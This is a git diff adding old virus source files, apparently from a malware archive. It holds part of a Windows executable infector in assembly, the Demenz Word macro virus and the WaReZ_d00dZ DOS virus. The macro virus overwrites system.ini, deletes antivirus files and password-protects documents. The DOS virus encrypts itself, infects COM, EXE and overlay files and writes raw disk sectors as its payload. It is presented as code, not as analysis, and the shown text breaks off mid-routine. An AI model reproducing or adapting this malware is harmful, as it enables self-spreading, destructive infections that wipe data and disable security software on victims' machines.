resource table entries + + mov ah,3EH ;close the file now + int 21H ;all done infecting! + +; mov ah,2FH ;report file name infected +; int 21H ;for DOS-based debugging purposes +; push es ;only! +; pop ds +; add bx,30 +; mov dx,bx +;ZLP: mov al,[bx] +; or al,al +; jz ZLP1 +; inc bx +; jmp ZLP +;ZLP1: mov BYTE PTR [bx],'$' +; mov ah,9 +; int 21H + + ret + +;The following procedure updates the Segment Table entries per item (1) in +;INFECT_FILE. +UPDATE_SEG_TBL: + mov dx,[bp+NEW_HDR+16H] ;read seg table entry + call GET_SEG_ENTRY ;for initial cs + mov ax,[bp+2] ;get seg size + add ax,VIRUS_SIZE ;add the size of the virus to seg size + mov [bp+2],ax ;and update size in seg table + + mov ax,[bp+6] ;get min allocation size of segment + or ax,ax ;is it 64K? + jz US2 ;yes, leave it alone +US1: add ax,VIRUS_SIZE ;add virus size on + jnc US2 ;no overflow, go and update + xor ax,ax ;else set size = 64K +US2: mov [bp+6],ax ;update size in table in ram + + mov ax,4201H + mov cx,0FFFFH + mov dx,-8 + int 21H ;back up to location of seg table entry + + mov ah,40H ;and write modified seg table entry + mov dx,bp ;for initial cs to segment table + mov cx,8 + int 21H ;ok, init cs seg table entry is modified + + mov di,[bp+NEW_HDR+1CH] ;get number of segment table entries + +US3: push di ;save table entry counter + mov dx,di ;dx=seg table entry # to read + call GET_SEG_ENTRY ;read it into disk buffer + + mov ax,[bp] ;get offset of this segment in file + cmp ax,[bp+INITSEC] ;higher than initial code segment? + jle US4 ;nope, don't adjust + add ax,[bp+VIRSECS] ;yes, add the size of virus in +US4: mov [bp],ax ;adjust segment loc in memory + + mov ax,4201H + mov cx,0FFFFH + mov dx,-8 + int 21H ;back up to location of seg table entry + + mov ah,40H ;and write modified seg table entry + mov dx,bp + mov cx,8 + int 21H + pop di ;restore table entry counter + dec di + jnz US3 ;and loop until all segments done + + ret ;all done + +;This routine goes to the segment table entry number specified in dx in the +;file and reads it into the disk buffer. dx=1 is the first entry! +GET_SEG_ENTRY: + mov ax,4200H ;seek in file + dec dx + mov cl,3 + shl dx,cl + add dx,[bp+NH_OFFSET] + add dx,[bp+NEW_HDR+22H] ;dx=ofs of seg table entry requested + xor cx,cx ; in the file + int 21H ;go to specified table entry + jc GSE1 ;exit on error + + mov ah,3FH ;read table entry into disk buf + mov dx,bp + mov cx,8 + int 21H +GSE1: ret + +;This routine moves the end of the virus out by VIRSECS. The "end" is +;everything after the initial code segment where the virus will live. +;The variable VIRSECS is assumed to be properly set up before this is called. +;This routine also sets up the RELOCS variable. +MOVE_END_OUT: + mov ax,[bp+CS_SIZE] ;size of cs in bytes + mov cx,[bp+LOG_SEC] + xor dx,dx + div cx + or dx,dx + jz ME01 + inc ax +ME01: add ax,[bp+INITSEC] ;ax=next sector after cs + push ax + + xor dx,dx + xor cx,cx + mov ax,4202H ;seek end of file + int 21H ;returns dx:ax = file size + mov cx,[bp+LOG_SEC] + div cx ;ax=sectors in file + mov si,ax ;keep it here + pop di ;last sector after code segment + dec di +MEO2: push si + push di + call MOVE_SECTOR ;move sector number si out + pop di + pop si + dec si + cmp si,di + jnz MEO2 ;and loop until all moved + + ret + +;This routine moves a single sector from SI to SI+VIRSECS +MOVE_SECTOR: + mov ax,si + mov cx,[bp+LOG_SEC] + mul cx + mov cx,dx + mov dx,ax + mov ax,4200H + int 21H ;seek sector si + + mov ah,3FH ;and read it + mov dx,bp + mov cx,[bp+LOG_SEC] + int 21H + + mov ax,[bp+VIRSECS] + dec ax ;calculate new, relative file ptr + mov cx,[bp+LOG_SEC] + mul cx + mov cx,dx + mov dx,ax + mov ax,4201H + int 21H ;and move there + + mov ah,40H + mov dx,bp + mov cx,[bp+LOG_SEC] + int 21H ;and write sector there + + ret + +;This routine simply sets the variable RELOCS and CS_SIZE variables in memory. +SET_RELOCS: + mov WORD PTR [bp+RELOCS],0 + mov dx,[bp+NEW_HDR+16H] ;read init cs seg table entry + call GET_SEG_ENTRY + mov ax,[bp+4] ;get segment flags + xor dx,dx + and ah,1 ;check for relocation data + mov ax,[bp+NEW_HDR+14H] ;size of segment is this + jz SRE ;no data, continue + push ax + push ax ;there is relocation data, how much? + mov ax,[bp+INITSEC] ;find end of code in file + mov cx,[bp+LOG_SEC] + mul cx ;dx:ax = start of cs in file + pop cx ;cx = size of code + add ax,cx + adc dx,0 + mov cx,dx + mov dx,ax ;cx:dx=end of cs in file + mov ax,4200H ;so go seek it + int 21H + mov ah,3FH ;and read 2 byte count of relocatables + mov dx,bp + mov cx,2 + int 21H + mov ax,[bp] + mov [bp+RELOCS],ax ;save count here + mov cl,3 + shl ax,cl + add ax,2 ;size of relocation data + pop cx ;size of code in segment + xor dx,dx + add ax,cx ;total size of segment + adc dx,0 +SRE: mov [bp+CS_SIZE],ax ;save it here + ret + +;This routine relocates the relocatables at the end of the initial code +;segment to make room for the virus. It will move any number of relocation +;records, each of which is 8 bytes long. +RELOCATE_RELOCS: + mov ax,[bp+RELOCS] ;number of relocatables + mov cl,3 + shl ax,cl + add ax,2 ;ax=total number of bytes to move + push ax + + mov ax,[bp+INITSEC] + mov cx,[bp+LOG_SEC] + mul cx ;dx:ax = start of cs in file + add ax,[bp+NEW_HDR+14H] + adc dx,0 ;dx:ax = end of cs in file + pop cx ;cx = size of relocatables + add ax,cx + adc dx,0 ;dx:ax = end of code+relocatables + xchg ax,cx + xchg dx,cx ;ax=size cx:dx=location + +RR_LP: push cx + push dx + push ax + cmp ax,512 + jle RR1 + mov ax,512 ;read up to 512 bytes +RR1: sub dx,ax ;back up file pointer + sbb cx,0 + push cx + push dx + push ax + mov ax,4200H ;seek desired location in file + int 21H + pop cx + mov ah,3FH + mov dx,bp + int 21H ;read needed number of bytes, # in ax + pop dx + pop cx + push ax ;save # of bytes read + add dx,VIRUS_SIZE ;move file pointer up now + adc cx,0 + mov ax,4200H + int 21H + pop cx ;bytes to write + mov ah,40H + mov dx,bp + int 21H ;write them to new location + pop ax + pop dx + pop cx + cmp ax,512 ;less than 512 bytes to write? + jle RRE ;yes, we're all done + sub ax,512 ;nope, adjust indicies + sub dx,512 + sbb cx,0 + jmp RR_LP ;and go do another + +RRE: ret + +;This routine writes the virus code itself into the code segment being infected. +;It also updates the jump which exits the virus so that it points to the old +;entry point in this segment. The only trick is that we can't write directly +;from cs since we can't just set ds=cs in windows or you get a fault. Thus +;we move the virus to the disk buffer and then write from there. +WRITE_VIRUS_CODE: + mov ax,[bp+INITSEC] ;sectors to code segment + mov cx,[bp+LOG_SEC] + mul cx ;dx:ax = location of code seg + add ax,[bp+NEW_HDR+14H] + adc dx,0 ;dx:ax = place to put virus + mov cx,dx + mov dx,ax + push cx + push dx ;save these to adjust jump + mov ax,4200H ;seek there + int 21H + mov si,[bp+VIRSTART] ;si=start of virus + mov cx,VIRUS_SIZE ;cx=size of virus +WVCLP: push cx + cmp cx,512 ;512 bytes maximum allowed per write + jle WVC1 + mov cx,512 +WVC1: push cx + mov di,bp ;now move virus to disk buffer +WCV2: mov al,cs:[si] ;get a byte from cs + inc si + stosb ;and save to disk buffer + loop WCV2 ;repeat until done + pop cx ;now write cx bytes to the file + mov dx,bp + mov ah,40H + int 21H + pop cx ;done writing, + cmp cx,512 ;did we have more than 512 bytes? + jle WVC3 ;nope, all done writing + sub cx,512 ;else subtract 512 + jmp WVCLP ;and do another + +WVC3: pop dx ;ok, now we have to update the jump + pop cx ;to the host + mov ax,OFFSET VIRUS_DONE - OFFSET VIRUS + inc ax + add dx,ax + adc cx,0 ;cx:dx=location to update + push ax + mov ax,4200H ;go there + int 21H + pop ax + inc ax + inc ax + add ax,[bp+NEW_HDR+14H] ;ax=offset of instr after jump + sub ax,[bp+ENTRYPT] ;ax=distance to jump + neg ax ;make it a negative number + mov [bp],ax ;save it here + mov ah,40H ;and write it to disk + mov cx,2 + mov dx,bp + int 21H ;all done + ret + +;Update the resource table so sector pointers are right. +UPDATE_RES_TABLE: + mov dx,[bp+NEW_HDR+24H] ;move to resource table in EXE + add dx,[bp+NH_OFFSET] + add dx,2 + xor cx,cx + mov ax,4200H + int 21H +URT1: + mov ah,3FH ;read 8 byte typeinfo record + mov dx,bp + mov cx,8 + int 21H + cmp WORD PTR [bp],0 ;is type ID 0? + jz URTE ;yes, all done + + mov cx,[bp+2] ;get count of nameinfo records to read + +URT2: push cx + mov ah,3FH ;read 1 nameinfo record + mov dx,bp + mov cx,12 + int 21H + + mov ax,[bp] ;get offset of resource + cmp ax,[bp+INITSEC] ;greater than initial cs location? + jle URT3 ;nope, don't worry about it + add ax,[bp+VIRSECS] ;add size of virus + mov [bp],ax + + mov ax,4201H ;now back file pointer up + mov dx,-12 + mov cx,0FFFFH + int 21H + mov ah,40H ;and write updated resource rec to + mov dx,bp ;the file + mov cx,12 + int 21H + +URT3: + pop cx + dec cx ;read until all nameinfo records for + jnz URT2 ;this typeinfo are done + + jmp URT1 ;go get another typeinfo record + + +URTE: ret + +;****************************************************************************** +END_VIRUS: ;label for the end of the windows virus + +;****************************************************************************** +;The following HOST is only here for the DOS-based loader. Once this infects +;a windows file, the virus will jump to the startup code for the program it +;is attached to. +HOST: mov ax,4C00H + int 21H + + END VIRUS + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.wm_demez.txt b/MSDOS/Virus.MSDOS.Unknown.wm_demez.txt new file mode 100644 index 00000000..008186ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wm_demez.txt @@ -0,0 +1,285 @@ +Name: Demenz +Author: Serialkiller +Resident: No +Encryption: Yes +Steahlt: Yes + +The virus have 5 macros: +- AutoOpen +- AutoNew +- Demenz +- ToolsMacro +- FileSave + +============================================================================= +============================================================================= +[AutoOpen] + +Sub MAIN +On Error Resume Next +n$ = DefaultDir$(2) + "\NORMAL.DOT" +f$ = FileName$() +If GetAttr(n$) < 32 Then Goto del +a = CountMacros(0) +If a > 0 Then + For b = 1 To a + If MacroName$(b, 0) = "AutoOpen" Then c = 1 + Next b +End If + +If c <> 1 Then +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoOpen", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoNew", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "Demenz", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileSave", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ToolsMacro", .Tab = 3 + +End If + +aa = CountMacros(1) +If aa > 0 Then + For bb = 1 To aa + If MacroName$(bb, 1) = "AutoOpen" Then cc = 1 + Next bb +End If + +If cc <> 1 Then + FileSaveAs .Format = 1 + fm$ = FileName$() + ":AutoOpen" + MacroCopy "AutoOpen", fm$ + fm$ = FileName$() + ":AutoNew" + MacroCopy "AutoNew", fm$ + fm$ = FileName$() + ":Demenz" + MacroCopy "Demenz", fm$ + fm$ = FileName$() + ":FileSave" + MacroCopy "FileSave", fm$ + fm$ = FileName$() + ":ToolsMacro" + MacroCopy "ToolsMacro", fm$ + +End If +End Sub + +============================================================================= + +[AutoNew] + +Sub MAIN +On Error Goto Finish +DisableInput 1 +Call AutoOpen +On Error Resume Next +SetAttr "C:\Windows\system.ini", 0 + Open "C:\Windows\system.ini" For Output As #1 + Print #1, "[*****************************]" + Print #1, "[***The Hackers Manifesto ***]" + Print #1, "[*****************************]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[This is our world now ...]" + Print #1, "[the world of the electron and the switch,]" + Print #1, "[the beaty of the baud. We make use of a servive already]" + Print #1, "[existing without paying for what could be dirt-cheap]" + Print #1, "[if it wasnt run by profiteering gluttons, and you]" + Print #1, "[callus criminals. We explore... and YOU call us]" + Print #1, "[criminals. We seek after knowledge... and YOU,]" + Print #1, "[call us criminals. We exist without skin color]" + Print #1, "[without nationality, without religious bias...]" + Print #1, "[and YOU call us criminals.]" + Print #1, "[YOU build atomic bombs, YOU wage wars, YOU murder,]" + Print #1, "[cheat, and let lie to us and try to make us belive its]" + Print #1, "[for OUR OWN GOOD, yet were the criminals.]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[Yes Im a criminal. My crime is that of coriosity.]" + Print #1, "[My crime is that of judging people by what they say]" + Print #1, "[and think, not what they look like. My crime is that]" + Print #1, "[of outsmarting YOU, something that YOU will never]" + Print #1, "[forgive me for.]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[I am a hacker, and this is my manifesto.]" + Print #1, "[YOU may stop this individual, but YOU cant stop us ALL]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[Serialkiller presents]" + Print #1, "[]" + Print #1, "[THE Demenz virus]" + Print #1, "[Greetings to all membaz aff the Codebreakers]" + Close #1 + +Finish: +End Sub + +============================================================================= + +[FileSave] + +Sub MAIN +FileSave +On Error Resume Next +FileSaveAs .Password = "Concetta" +End Sub + +============================================================================= + +[Demenz] + +Sub MAIN +On Error Resume Next +SE1$ = Files$("C:\PC-Cillin 95\Scan32.dll") +If SE1$ = "" Then Goto AV2 +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul" +Print #1, "del c:\pc-cil~1\*.dll >nul" +Close #1 +Kill "C:\PC-Cillin 95\Lpt$vpn.*" + +AV2: +SE2$ = Files$("C:\PC-Cillin 97\Scan32.dll") +If SE2$ = "" Then Goto AV3 +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul" +Print #1, "del c:\pc-cil~1\*.dll >nul" +Close #1 +Kill "C:\PC-Cillin 97\Lpt$vpn.*" + +AV3: +SE3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll") +If SE3$ = "" Then Goto AV4 +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul" +Print #1, "del c:\tsc\pc-cil~1\*.dll >nul" +Close #1 +Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*" + +AV4: +SE4$ = Files$("C:\Zlockav\Gsav.dat") +If SE4$ = "" Then Goto AV5 +Kill SE4$ +Kill "C:\Zlockav\Gsav.cas" + +AV5: +SE5$ = Files$("C:\VB7\Virus.txt") +If SE5$ = "" Then Goto AV6 +Kill SE5$ + +AV6: +SE6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat") +If SE6$ = "" Then Goto AV7 +Kill SE6$ +Kill "C:\Program Files\Symantec\Symevnt.386" + +AV7: +SE7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat") +If SE7$ = "" Then Goto AV8 +Kill SE7$ +Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll" + +AV8: +SE8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat") +If SE8$ = "" Then Goto AV9 +Kill SE8$ +Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll" + +AV9: +SE9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def") +If SE9$ = "" Then Goto AV10 +Kill SE9$ +Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd" + +AV10: +SE10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe") +If SE10$ = "" Then Goto AV11 +Kill SE10$ +Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc" + +AV11: +SE11$ = Files$("C:\TBAVW95\Tbscan.sig") +If SE11$ = "" Then Goto joke +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul" +Print #1, "del c:\Tbavw95\Tb*.* >nul" +Close #1 +Kill "C:\Tbavw95\Tbavw95.vxd" + +joke: +SE12$ = Files$("C:\Programme\Norton AntiVirus\*.dat") +If SE12$ = "" Then Goto exit +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\Programme Norton AntiVirus\*.* >nul" +Print #1, "del c:\Norton AntiVirus\*.* >nul" +Close #1 +Kill "C:\Programme\Norton AntiVirus\*.dat" +Kill "C:\Programme\Symantec\Symevnt.386" +exit: +End Sub + +============================================================================= +[ToolsMacro] + +Sub MAIN + +B$ = "Out of memory." +C$ = "WordBasic Err = 7" +Dim ComboBox1$(0) +ComboBox1$(0) = "" +Dim ListBox1$(0) +ListBox1$(0) = "" +Dim DropListBox2$(0) +DropListBox2$(0) = "Normal.dot(Global Template)" + + +A: +Begin Dialog UserDialog 442, 320, "Macro" + CancelButton 290, 38, 141, 21 + PushButton 290, 14, 141, 21, "Rec&ord...", .D2 + + + PushButton 290, 72, 141, 21, "&Run", .D3 + PushButton 290, 97, 141, 21, "&Cancel", .D4 + PushButton 290, 125, 141, 21, "&Delete", .D5 + PushButton 290, 161, 141, 21, "Or&ganizer...", .D6 + ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1 + + Text 6, 223, 93, 13, "Macros &Available In:", .T1 + Text 7, 259, 109, 13, "Description:", .T2 + Text 7, 7, 93, 13, "&Macro Name:", .T3 + ListBox 7, 276, 425, 38, ListBox1$(), .LB1 + + DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2 + +End Dialog + +Redim dlg As UserDialog + x = Dialog(dlg) +Select Case x + Case 0 + Cancel + Case 1 + MsgBox B$, C$, 48 + Goto A + Case 2 + MsgBox B$, C$, 48 + Goto A + Case 3 + MsgBox B$, C$, 48 + Goto A + Case 4 + MsgBox B$, C$, 48 + Goto A + Case 5 + MsgBox B$, C$, 48 + Goto A + End Select +End Sub diff --git a/MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm b/MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm new file mode 100644 index 00000000..38dabcbe --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm @@ -0,0 +1,681 @@ +; PX.ASM : [WaReZ_d00dZ] by [pAgE] +; Created wik the Phalcon/Skism Mass-Produced Code Generator +; from the configuration file skeleton.cfg + +.model tiny ; Handy directive +.code ; Virus code segment + org 100h ; COM file starting IP +idi = 'FB' +id = 'ZP' ; ID word for EXE infections +entry_point: db 0e9h,0,0 ; jmp decrypt + +decrypt: ; handles encryption and decryption +patch_startencrypt: + mov di,offset startencrypt ; start of decryption + mov cx,(offset heap - offset startencrypt)/2 ; iterations +decrypt_loop: + db 2eh,81h,05h ; add word ptr cs:[di], xxxx +decrypt_value dw 0 ; initialised at zero for null effect + inc di ; calculate new decryption location + inc di + loop decrypt_loop ; decrypt mo' +startencrypt: + call next ; calculate delta offset +next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + cmp sp,id ; COM or EXE? + je restoreEXE + cmp sp,idi ; COM or EXE? + je restoreOVR + +restoreCOM: + lea si,[bp+save3] + mov di,100h + push di ; For later return + movsb + jmp short restoreEXIT +restoreEXE: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreOVR: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreEXIT: + movsw + + mov byte ptr [bp+numinfec],50; reset infection counter + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + mov ah,47h ; Get current directory + mov dl,0 ; Current drive + lea si,[bp+origdir] ; DS:SI->buffer + int 21h + mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR + + mov ax,3524h ; Get int 24 handler + int 21h ; to ES:BX + mov word ptr [bp+oldint24],bx; Save it + mov word ptr [bp+oldint24+2],es + mov ah,25h ; Set new int 24 handler + lea dx,[bp+offset int24] ; DS:DX->new handler + int 21h + push cs ; Restore ES + pop es ; 'cuz it was changed + +dir_scan: ; "dot dot" traversal + + lea dx,[bp+ovr_mask] + call infect_mask + lea dx,[bp+exe_mask] + call infect_mask + lea dx,[bp+com_mask] + call infect_mask + mov ah,3bh ; change directory + lea dx,[bp+dot_dot] ; "cd .." + int 21h + jnc dir_scan ; go back for mo! + +done_infections: + mov ah,2ah ; Get current date + int 21h + cmp dh,1 ; Check month + jb exit_virus + cmp cx,1992 ; Check year + jb exit_virus + cmp al,0 ; Check date of week + jae activate + +exit_virus: + mov ax,2524h ; Restore int 24 handler + lds dx,[bp+offset oldint24] ; to original + int 21h + push cs + pop ds + + mov ah,3bh ; change directory + lea dx,[bp+origdir-1] ; original directory + int 21h + + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + cmp sp,id-4 ; EXE or COM? + jz returnEXE +returnCOM: + int 27h + retn ; 100h is on stack +returnEXE: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti +returnOVR: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo +jmpsave dd ? ; Original CS:IP +stacksave dd ? ; Original SS:SP +jmpsave2 db ? ; Actually four bytes +save3 db 0cdh,20h,0 ; First 3 bytes of COM file +stacksave2 dd ? + +activate proc far + +start: + jmp short loc_1 + db 90h +data_2 db 0 +data_3 dw 2B1h + db 2 +data_4 dw 0 + db 'HEY!!! Blow ME, WaReZ FAGGOT' + db 1Ah +data_5 db 'You got sorta lucky!!!', 0Dh, 0Ah + db '$' +loc_1: + mov ah,0Fh + int 010h + xor ah,ah + int 010h + mov ax,0002h + mov cx,0100h + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov bx,0B800h + cmp al,2 + je loc_2 ; Jump if equal + cmp al,3 + je loc_2 ; Jump if equal + mov data_2,0 + mov bx,0B000h + cmp al,7 + je loc_2 ; Jump if equal + mov dx,offset data_5 ; ('Unsupported Video Mode') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + retn +loc_2: + mov es,bx + mov di,data_4 + mov si,offset data_6 + mov dx,3DAh + mov bl,9 + mov cx,data_3 + cld ; Clear direction + xor ax,ax ; Zero register + +locloop_4: + lodsb ; String [si] to al + cmp al,1Bh + jne loc_5 ; Jump if not equal + xor ah,80h + jmp short loc_20 +loc_5: + cmp al,10h + jae loc_8 ; Jump if above or = + and ah,0F0h + or ah,al + jmp short loc_20 +loc_8: + cmp al,18h + je loc_11 ; Jump if equal + jnc loc_12 ; Jump if carry=0 + sub al,10h + add al,al + add al,al + add al,al + add al,al + and ah,8Fh + or ah,al + jmp short loc_20 +loc_11: + mov di,data_4 + add di,data_1e + mov data_4,di + jmp short loc_20 +loc_12: + mov bp,cx + mov cx,1 + cmp al,19h + jne loc_13 ; Jump if not equal + lodsb ; String [si] to al + mov cl,al + mov al,20h ; ' ' + dec bp + jmp short loc_14 +loc_13: + cmp al,1Ah + jne loc_15 ; Jump if not equal + lodsb ; String [si] to al + dec bp + mov cl,al + lodsb ; String [si] to al + dec bp +loc_14: + inc cx +loc_15: + cmp data_2,0 + je loc_18 ; Jump if equal + mov bh,al + +locloop_16: + in al,dx ; port 3DAh, CGA/EGA vid status + rcr al,1 ; Rotate thru carry + jc locloop_16 ; Jump if carry Set +loc_17: + in al,dx ; port 3DAh, CGA/EGA vid status + and al,bl + jnz loc_17 ; Jump if not zero + mov al,bh + stosw ; Store ax to es:[di] + loop locloop_16 ; Loop if cx > 0 + + jmp short loc_19 +loc_18: + rep stosw ; Rep when cx >0 Store ax to es:[di] +loc_19: + mov cx,bp +loc_20: + jcxz loc_ret_21 ; Jump if cx=0 + loop locloop_4 ; Loop if cx > 0 + + +loc_ret_21: + + push dx + mov al,002h + mov cx,030h + cli + cwd + int 026h + pop dx + mov ax,04C00h + int 021h + +activate endp + jmp exit_virus + +creator db '[MPC]',0 ; Mass Produced Code Generator +virusname db '[WaReZ_d00dZ]',0 +author db '[pAgE]',0 + +infect_mask: + mov ah,4eh ; find first file + mov cx,7 ; any attribute +findfirstnext: + int 21h ; DS:DX points to mask + jc exit_infect_mask ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + cmp word ptr [bp+buffer],'ZM'; EXE? + jz checkEXE ; Why yes, yes it is! + cmp word ptr [bp+buffer],'FB'; EXE? + jz checkOVR ; Why yes, yes it is! +checkCOM: + mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA + mov bx,word ptr [bp+buffer+1]; get jmp location + add bx,heap-decrypt+3 ; Adjust for virus size + cmp ax,bx + je find_next ; already infected + jmp infect_com +checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe +checkOVR: cmp word ptr [bp+buffer+10h],idi ; is it already infected? + jnz infect_ovr +find_next: + mov ah,4fh ; find next file + jmp short findfirstnext +exit_infect_mask: ret + +infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-decrypt ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp finishinfection +infect_ovr: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h],idi + + pop dx ; get file length + pop ax + + add ax, heap-decrypt ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp short finishinfection +infect_com: ; ax = filesize + mov cx,3 + sub ax,cx + lea si,[bp+offset buffer] + lea di,[bp+offset save3] + movsw + movsb + mov byte ptr [si-3],0e9h + mov word ptr [si-2],ax + add ax,103h + push ax ; needed later +finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,2ch ; Get current time + int 21h ; dh=sec,dl=1/100 sec + mov [bp+decrypt_value],dx ; Set new encryption value + lea di,[bp+code_store] + mov ax,5355h ; push bp,push bx + stosw + lea si,[bp+decrypt] ; Copy encryption function + mov cx,startencrypt-decrypt ; Bytes to move + push si ; Save for later use + push cx + rep movsb + + xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub + + lea si,[bp+write] ; Copy writing function + mov cx,endwrite-write ; Bytes to move + rep movsb + pop cx + pop si + pop dx ; Entry point of virus + push di + push si + push cx + rep movsb ; Copy decryption function + mov ax,5b5dh ; pop bx,pop bp + stosw + mov al,0c3h ; retn + stosb + + add dx,offset startencrypt - offset decrypt ; Calculate new + mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of + call code_store ; decryption + pop cx + pop di + pop si + rep movsb ; Restore decryption function + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; 